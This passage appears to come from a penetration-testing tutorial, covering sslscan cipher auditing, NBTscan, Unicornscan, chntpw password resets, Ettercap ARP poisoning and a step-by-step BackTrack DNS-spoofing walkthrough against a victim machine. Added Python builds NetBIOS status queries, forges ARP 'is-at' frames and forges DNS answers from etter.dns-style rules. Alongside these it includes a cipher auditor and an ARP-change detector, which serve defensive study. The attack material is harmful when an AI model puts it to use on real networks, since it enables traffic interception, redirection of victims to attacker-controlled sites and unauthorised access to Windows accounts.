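  Rejected  SSLv3  256 bits  ADH-AES256-SHA
  Accepted  SSLv3  256 bits  DHE-RSA-AES256-SHA
  Accepted  SSLv3  40 bits   EXP-DES-CBC-SHA
  Accepted  SSLv3  128 bits  RC4-MD5
  Rejected  SSLv3  0 bits    NULL-SHA
  Accepted  TLSv1  256 bits  DHE-RSA-AES256-SHA
  Accepted  TLSv1  56 bits   DES-CBC-SHA
  Accepted  TLSv1  128 bits  RC4-SHA

Prefered Server Cipher(s):
  SSLv2  168 bits  DES-CBC3-MD5
"""


def parse_accepted(text):
    """Return [(protocol, bits, suite)] for every Accepted line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) == "Accepted":
            out.append((m.group(2), int(m.group(3)), m.group(4)))
    return out


def weaknesses(suite, bits):
    """Tags saying why a suite is weak; an empty list means acceptable here."""
    tags = []
    if "NULL" in suite:
        tags.append("no-encryption")
    if suite.startswith(("ADH-", "AECDH-", "EXP-ADH-")):
        tags.append("anonymous-dh")
    if suite.startswith("EXP-") or bits < 56:
        tags.append("export-grade")
    if "DES-CBC-" in suite or bits == 56:
        tags.append("single-des")
    if "RC4" in suite:
        tags.append("rc4")
    if suite.endswith("-MD5"):
        tags.append("md5-mac")
    return tags


def audit(text):
    """Summarise a listing: suites per protocol, weak suites with their
    tags (SSLv2 suites are always weak: the protocol itself is broken),
    and headline findings."""
    by_proto, weak = {}, []
    for proto, bits, suite in parse_accepted(text):
        by_proto.setdefault(proto, []).append(suite)
        tags = (["sslv2"] if proto == "SSLv2" else []) + weaknesses(suite, bits)
        if tags:
            weak.append((proto, suite, tags))
    findings = []
    if "SSLv2" in by_proto:
        findings.append("SSLv2 enabled")
    if any("export-grade" in t for _, _, t in weak):
        findings.append("export-grade (40-bit) ciphers accepted")
    if any("rc4" in t for _, _, t in weak):
        findings.append("RC4 accepted")
    return {"by_protocol": by_proto, "weak": weak, "findings": findings}


if __name__ == "__main__":
    result = audit(SAMPLE)
    for f in result["findings"]:
        print("FINDING:", f)
    for proto, suite, tags in result["weak"]:
        print(f"  {proto:6} {suite:26} {', '.join(tags)}")
```

Pipe a real run through it with `sslscan host > out.txt` and pass the file contents to `audit`; the "Prefered" block matters too, since a server that prefers a strong suite can still be pushed down to a weak one by a client that offers nothing else.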

NBTScan

NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.NBTscan compiles and runs on Unix and Windows. I have tested it on Windows NT 4.0, Windows 2000, FreeBSD 4.3, OpenBSD 2.8 and RedHat Linux 7.1 and 7.3. It should also compile and run on Solaris and other Linuxes as well.

This program is a successor to a Perl script of the same name and does essentially the same thing, only much faster. NBTscan produces a report like this:

IP address       NetBIOS Name   Server    User           MAC address
--------------------------------------------------------------------
192.168.1.2      MYCOMPUTER               JDOE           00-a0-c9-12-34-56
192.168.1.5      WIN98COMP                RROE           00-a0-c9-78-90-00
192.168.1.123    DPTSERVER      <server>  ADMINISTRATOR  08-00-09-12-34-56

The first column lists the IP address of the responding host. The second column is the computer name. The third column indicates whether this computer shares, or is able to share, files or printers; for an NT machine it means that the Server service is running on this computer, and most often it means that this computer shares files. The fourth column shows the user name; if no one is logged on from this computer it is the same as the computer name. The last column shows the adapter MAC address.

If run with the -v switch NBTscan lists the whole NetBIOS name table for each responding address. The output looks like this:

NetBIOS Name Table for Host 192.168.1.123:

Name             Service          Type
----------------------------------------
DPTSERVER        <00>             UNIQUE
DPTSERVER        <20>             UNIQUE
DEPARTMENT       <00>             GROUP
DEPARTMENT       <1c>             GROUP
DEPARTMENT       <1b>             UNIQUE
DEPARTMENT       <1e>             GROUP
DPTSERVER        <03>             UNIQUE
DEPARTMENT       <1d>             UNIQUE
??__MSBROWSE__?  <01>             GROUP
INet~Services    <1c>             GROUP
IS~DPTSERVER     <00>             UNIQUE
DPTSERVER        <01>             UNIQUE

Adapter address: 00-a0-c9-12-34-56
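The status query itself is simple enough to build by hand. The following Python is an added example, not nbtscan's code: it assembles the RFC 1002 node-status request that nbtscan sends to UDP port 137, parses a reply into the name table shown above, and derives the one-line summary (computer name, Server service, workgroup/domain, logged-on user, MAC) from the suffix rules the text describes. It never touches the network: the reply it parses is constructed from the DPTSERVER table above, with an ADMINISTRATOR <03> entry added so that the user-name rule has something to find.

```python
"""Build the NetBIOS node-status request nbtscan sends (UDP/137) and parse
the reply into the table nbtscan prints.

Added example, not nbtscan's code. Nothing here touches the network: the
reply parsed below is constructed from the DPTSERVER name table above, so the
RFC 1002 NODE STATUS request/response format can be checked offline.
"""
import struct

NBSTAT = 0x0021      # NBSTAT resource record type
WILDCARD = b"*"      # node-status queries ask for the "*" name

# Constructed from the DPTSERVER table above; (name, suffix, is_group). The
# ADMINISTRATOR <03> entry is added so the user-name rule has a hit.
ENTRIES = [
    ("DPTSERVER", 0x00, False), ("DPTSERVER", 0x20, False),
    ("DEPARTMENT", 0x00, True), ("DEPARTMENT", 0x1C, True),
    ("DEPARTMENT", 0x1B, False), ("DEPARTMENT", 0x1E, True),
    ("DPTSERVER", 0x03, False), ("DEPARTMENT", 0x1D, False),
    ("..__MSBROWSE__.", 0x01, True), ("INet~Services", 0x1C, True),
    ("IS~DPTSERVER", 0x00, False), ("ADMINISTRATOR", 0x03, False),
]
MAC = bytes.fromhex("00a0c9123456")


def encode_name(name):
    """First-level encoding (RFC 1001 s.14.1): pad the name to 16 bytes, split
    each byte into two nibbles and add 'A' to each. Returns the 34-byte wire
    form: length byte 0x20, 32 encoded characters, terminating zero."""
    raw = name.ljust(16, b"\x00")[:16]
    enc = bytes(n for c in raw for n in ((c >> 4) + 0x41, (c & 0x0F) + 0x41))
    return b"\x20" + enc + b"\x00"


def build_status_request(txid=0x1234):
    """The datagram nbtscan sends to each address: one question for '*',
    type NBSTAT, class IN."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(WILDCARD) + struct.pack(">HH", NBSTAT, 1)


def parse_status_response(data):
    """Return {"names": [(name, suffix, "GROUP"|"UNIQUE", active)], "mac": str}."""
    _, flags, _, ancount = struct.unpack(">HHHH", data[:8])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a node-status response")
    pos = 12
    while data[pos] != 0:              # skip the answer's encoded name
        pos += data[pos] + 1
    pos += 1
    rtype, _, _, _ = struct.unpack(">HHIH", data[pos:pos + 10])
    if rtype != NBSTAT:
        raise ValueError("answer is not an NBSTAT record")
    pos += 10
    count, pos = data[pos], pos + 1
    names = []
    for _ in range(count):
        entry, pos = data[pos:pos + 18], pos + 18
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append((entry[:15].rstrip(b" ").decode("latin-1"), entry[15],
                      "GROUP" if nflags & 0x8000 else "UNIQUE",
                      bool(nflags & 0x0400)))          # ACT bit
    mac = "-".join(f"{b:02x}" for b in data[pos:pos + 6])
    return {"names": names, "mac": mac}


def summarize(parsed):
    """Derive nbtscan's one-line report from the table, using the suffix
    rules described in the text: <00> unique = computer name, <00> group =
    workgroup/domain, <20> unique = Server service running, <03> unique that
    is not the computer name = logged-on user, <1c> group = domain controller."""
    names = parsed["names"]
    computer = next((n for n, s, k, _ in names if s == 0x00 and k == "UNIQUE"), None)
    users = [n for n, s, k, _ in names if s == 0x03 and k == "UNIQUE" and n != computer]
    return {
        "computer": computer,
        "workgroup": next((n for n, s, k, _ in names if s == 0x00 and k == "GROUP"), None),
        "server": any(s == 0x20 and k == "UNIQUE" for _, s, k, _ in names),
        "user": users[0] if users else computer,
        "domain_controller": any(s == 0x1C and k == "GROUP" for _, s, k, _ in names),
        "mac": parsed["mac"],
    }


def build_status_response(entries, mac, txid=0x1234):
    """Constructed reply for offline testing, laid out as RFC 1002 4.2.18."""
    rdata = bytes([len(entries)])
    for name, suffix, group in entries:
        nflags = (0x8000 if group else 0) | 0x0400
        rdata += name.encode("latin-1").ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += mac + b"\x00" * 40                      # unit ID (MAC) + statistics
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    return header + encode_name(WILDCARD) + struct.pack(">HHIH", NBSTAT, 1, 0, len(rdata)) + rdata


if __name__ == "__main__":
    reply = build_status_response(ENTRIES, MAC)
    table = parse_status_response(reply)
    for name, suffix, kind, _ in table["names"]:
        print(f"{name:<16}<{suffix:02x}>  {kind}")
    print("Adapter address:", table["mac"])
    print(summarize(table))
```

To use it live, send `build_status_request()` over a UDP socket to port 137 of each address and hand whatever comes back to `parse_status_response`; hosts that do not answer within a second or so are simply not running NetBIOS over TCP/IP, which is what nbtscan's silent rows mean.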

Unicornscan

Unicornscan is a new information gathering and correlation engine built for and by members of the security research and testing communities. It was designed to provide an engine that is Scalable, Accurate, Flexible, and Efficient. It is released for the community to use under the terms of the GPL license.

Benefits:

Unicornscan is an attempt at a user-land distributed TCP/IP stack. It is intended to provide a researcher with a superior interface for introducing a stimulus into, and measuring a response from, a TCP/IP enabled device or network. Although it currently has hundreds of individual features, the main set of abilities includes:

- Asynchronous stateless TCP scanning with all variations of TCP flags.
- Asynchronous stateless TCP banner grabbing.
- Asynchronous protocol-specific UDP scanning (sending enough of a signature to elicit a response).
- Active and passive remote OS, application, and component identification by analyzing responses.
- PCAP file logging and filtering.
- Relational database output.
- Custom module support.
- Customized data-set views.

chntpw

chntpw is a Linux utility to (re)set the password of any user that has a valid (local) account on your Windows NT or Windows 2000 system, by modifying the encrypted password in the registry's SAM file. You do not need to know the old password to set a new one. It works offline, i.e. you have to shut down the computer and boot off a Linux disk; the boot disk includes what is needed to access NTFS partitions and scripts to glue the whole thing together. The utility works with SYSKEY and includes the option to turn it off. Note that it blanks or replaces the password; it cannot recover the old one, and the partition must be mounted read-write for the change to be saved. Once the Windows partition is mounted, change into its registry hive directory:

Code:
cd /mnt/<mounted Windows partition>/Windows/System32/config

While still in the Windows/System32/config directory, run chntpw interactively on the SAM hive. This is how mine looked:

Code:
root@Expl0it3:/mnt/sda1/Windows/System32/config# chntpw -i sam

Ettercap

Another great tool is Ettercap, the Swiss army knife of ARP poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has an ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M ARP // //


Or

ettercap -T -q -p -M ARP // //

Be careful with the above command: having all of the traffic on a large network going through one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M ARP /192.168.1.1/ //

or

ettercap -T -q -p -M ARP // //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. Here is what the command line option flags do:

-T tells Ettercap to use the text interface; I like this option the best as the GUI modes are rather confusing.
-q tells Ettercap to be quiet, in other words less verbose.
-p tells Ettercap not to put the interface into promiscuous mode.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
The two trailing arguments are the target specifications: an empty // means every host on that side, and /192.168.1.1/ restricts that side to one address.
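To see what -M ARP does on the wire, and how a defender notices it, here is an added Python example (not Ettercap's code). build_arp_reply() assembles the Ethernet/ARP "is-at" frame a poisoner sends, an unsolicited reply that binds the gateway's IP to the attacker's MAC; ArpWatch replays a constructed sequence of such frames and raises an alert when an IP it has already seen turns up with a different MAC, which is the evidence arpwatch-style tools and IDS signatures rely on. All MAC and IP addresses are made up for the example.

```python
"""What "-M ARP" puts on the wire, and how a defender notices it.

Added example, not Ettercap's code. build_arp_reply() assembles the
Ethernet/ARP "is-at" frame a poisoner sends: an unsolicited reply binding the
gateway's IP to the attacker's MAC. ArpWatch replays a constructed sequence
of such frames and raises an alert when an IP it already knows turns up with
a different MAC. All MAC and IP addresses are made up for the example.
"""
import socket
import struct

ETH_P_ARP = 0x0806


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying the ARP reply "sender_ip is at sender_mac".

    For poisoning, sender_ip is the gateway's address and sender_mac the
    attacker's. Most stacks update their cache on an unsolicited reply, so
    the victim (target_mac/target_ip) starts sending gateway-bound traffic
    to the attacker.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack(">H", ETH_P_ARP)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)   # Ethernet, IPv4, hlen, plen, opcode 2 = reply
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip), or None
    if the frame is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack(">H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack(">HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return (op, mac_str(frame[22:28]), socket.inet_ntoa(frame[28:32]),
            mac_str(frame[32:38]), socket.inet_ntoa(frame[38:42]))


class ArpWatch:
    """Track the IP -> MAC bindings seen in ARP traffic and report changes."""

    def __init__(self):
        self.table = {}
        self.alerts = []

    def feed(self, frame):
        """Process one frame; returns an alert string if it flipped a binding."""
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, smac, sip, _, _ = parsed
        known = self.table.get(sip)
        self.table[sip] = smac
        if known is None or known == smac:
            return None
        # A second MAC claiming an IP we already know: poisoning, or a
        # legitimate NIC swap, which is why real tools log both sides.
        alert = f"{sip} changed from {known} to {smac} (opcode {op})"
        self.alerts.append(alert)
        return alert


def demo():
    """Replay a constructed sequence: the real gateway answers twice, then an
    attacker sends a spoofed reply for the same IP. Returns the alerts."""
    watch = ArpWatch()
    victim = ("aa:bb:cc:dd:ee:01", "192.168.1.50")
    legit = build_arp_reply("00:11:22:33:44:55", "192.168.1.1", *victim)
    spoof = build_arp_reply("de:ad:be:ef:00:01", "192.168.1.1", *victim)
    for frame in (legit, legit, spoof):
        watch.feed(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in demo():
        print("ALERT:", alert)
```

On a live segment the frames would come from a raw socket or a pcap reader rather than `build_arp_reply`; the watcher logic is the same, and seeding its table from a known-good ARP cache before the test starts gives it a baseline to compare against.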

DNS Spoofing with Ettercap & BackTrack

Fire up a terminal (the little black box in the bottom left) and enter:

/etc/init.d/networking start

Prepare Apache

BackTrack is now online and ready to go, but we need to get the webserver ready to accept whatever domain we throw at it using our DNS Spoofing.

You'll need to run pico /etc/apache2/sites-available/default in the terminal and add a ServerAlias line below 'ServerAdmin webmaster@localhost', so that the block reads:

ServerAdmin webmaster@localhost
ServerAlias *
DocumentRoot /var/www/

This specifies that whatever domain is pointed at the webserver is to be served the default web content in /var/www.

We just need to restart Apache for it to take effect:

/etc/init.d/apache2 restart

Apache is ready.

Mounting the Attack

Open the little BackTrack icon in the bottom left (start menu type situation) and pick BackTrack –> Privilege Escalation –> Sniffers –> Ettercap GTK:


Select Sniff –> Unified Sniffing:

Then click 'OK' on the interface it selects.

Next select Hosts –> Scan for hosts. It will scan your local network for active machines. Then select Hosts –> Hosts List.


Now we need to know the IP of the network's gateway and the victim's IP address. These are reasonably simple to find.

To figure out the network gateway head back to the terminal and enter route -n:

You’ll notice gateway is 192.168.1.1, now to find our target.


To track it down you'll need some defining feature: a particular OS or service (perhaps a banner you can check).

In my case the target is a Windows XP machine. I used Zenmap (nmap GUI) on each of the IPs to OS fingerprint them and find my target:

With the target established we need to set up the DNS Spoof plugin in Ettercap to behave how we'd like. Back in the terminal enter pico /usr/share/ettercap/etter.dns.

Head down to where it starts mentioning Microsoft's domains and add an entry in the same format, i.e. 'google.co.uk A 192.168.1.7' (name, record type, address, one record per line; an extra '*.google.co.uk' entry catches every host under the domain), where google.co.uk is the domain you want to spoof and 192.168.1.7 is the BackTrack machine's IP (run ifconfig in the terminal to find out):


Now then, back to Ettercap.

Make the gateway ‘Target 1′ and the target machine ‘Target 2′, then click Plugins –> Manage Plugins and double click on the Spoof DNS plugin:

Next go to Mitm –> Arp Poisoning, tick ‘Sniff Remote Connections’ and click ok. Then click Start –> Start Sniffing.

Head to the victim machine and try going to your DNS Spoofed domain, in my case google.co.in:
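What the Spoof DNS plugin does with those etter.dns entries is, in protocol terms, small: it watches for A queries for a matching name and answers them itself, ahead of the real resolver. The following Python is an added example, not Ettercap's code: it parses rules in etter.dns syntax (name, record type, address, with a leading '*.' wildcard), decides whether a captured query matches, and forges the response packet (same transaction ID, the question copied back, one A record pointing at the attacker). The query is constructed in the script, so it runs offline; in a real attack the forged answer also has to reach the victim before the genuine one, which is why Ettercap does this from the MITM position set up above.

```python
"""A minimal version of what Ettercap's dns_spoof plugin does with etter.dns.

Added example, not Ettercap's code. It parses etter.dns-style rules
("name  A  address", with a leading "*." wildcard), and for a captured DNS
query decides whether to forge an answer and builds the response packet:
same transaction ID, question copied back, one A record pointing at the
attacker. The query packet is constructed here, so it runs offline.
"""
import socket
import struct

# Constructed rule set in etter.dns syntax; 192.168.1.7 is the BackTrack box.
RULES_TEXT = """\
# spoof Google to the local web server
google.co.uk      A  192.168.1.7
*.google.co.uk    A  192.168.1.7
"""


def parse_rules(text):
    """Return [(pattern, ip)] for every A rule; comments and blanks ignored."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) == 3 and parts[1].upper() == "A":
            rules.append((parts[0].lower().rstrip("."), parts[2]))
    return rules


def match_rule(name, rules):
    """First rule whose pattern matches `name` (exact, or '*.' suffix)."""
    name = name.lower().rstrip(".")
    for pattern, ip in rules:
        if pattern.startswith("*."):
            if name.endswith(pattern[1:]):      # "*.google.co.uk" -> ".google.co.uk"
                return ip
        elif name == pattern:
            return ip
    return None


def encode_qname(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"


def decode_qname(data, pos):
    """Return (name, position after the terminating zero); no compression."""
    labels = []
    while data[pos] != 0:
        n = data[pos]
        labels.append(data[pos + 1:pos + 1 + n].decode())
        pos += 1 + n
    return ".".join(labels), pos + 1


def build_query(txid, name, qtype=1):
    """A standard recursive query (RD set) for `name`, type A by default."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack(">HH", qtype, 1)


def spoof_response(query, rules, ttl=60):
    """Return a forged response for `query`, or None if no rule matches
    (or it is not a standard A/IN query)."""
    txid, flags, qdcount = struct.unpack(">HHH", query[:6])
    if flags & 0x8000 or qdcount != 1:
        return None
    name, pos = decode_qname(query, 12)
    qtype, qclass = struct.unpack(">HH", query[pos:pos + 4])
    if (qtype, qclass) != (1, 1):
        return None
    ip = match_rule(name, rules)
    if ip is None:
        return None
    question = query[12:pos + 4]
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR, RD, RA
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + answer


def parse_answer_ip(response):
    """Pull the A record address out of a response built above (a single
    answer whose name is the 0xc00c pointer to the question)."""
    _, pos = decode_qname(response, 12)
    pos += 4                                  # skip qtype, qclass
    _, _, _, rdlen = struct.unpack(">HHIH", response[pos + 2:pos + 12])
    return socket.inet_ntoa(response[pos + 12:pos + 12 + rdlen])


if __name__ == "__main__":
    rules = parse_rules(RULES_TEXT)
    query = build_query(0xBEEF, "www.google.co.uk")
    response = spoof_response(query, rules)
    print("www.google.co.uk ->", parse_answer_ip(response) if response else "not spoofed")
```

The victim's resolver accepts the first answer whose transaction ID and question match, which is all the forgery needs; the same fact is why a detector looks for two answers to one query ID arriving from different sources.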
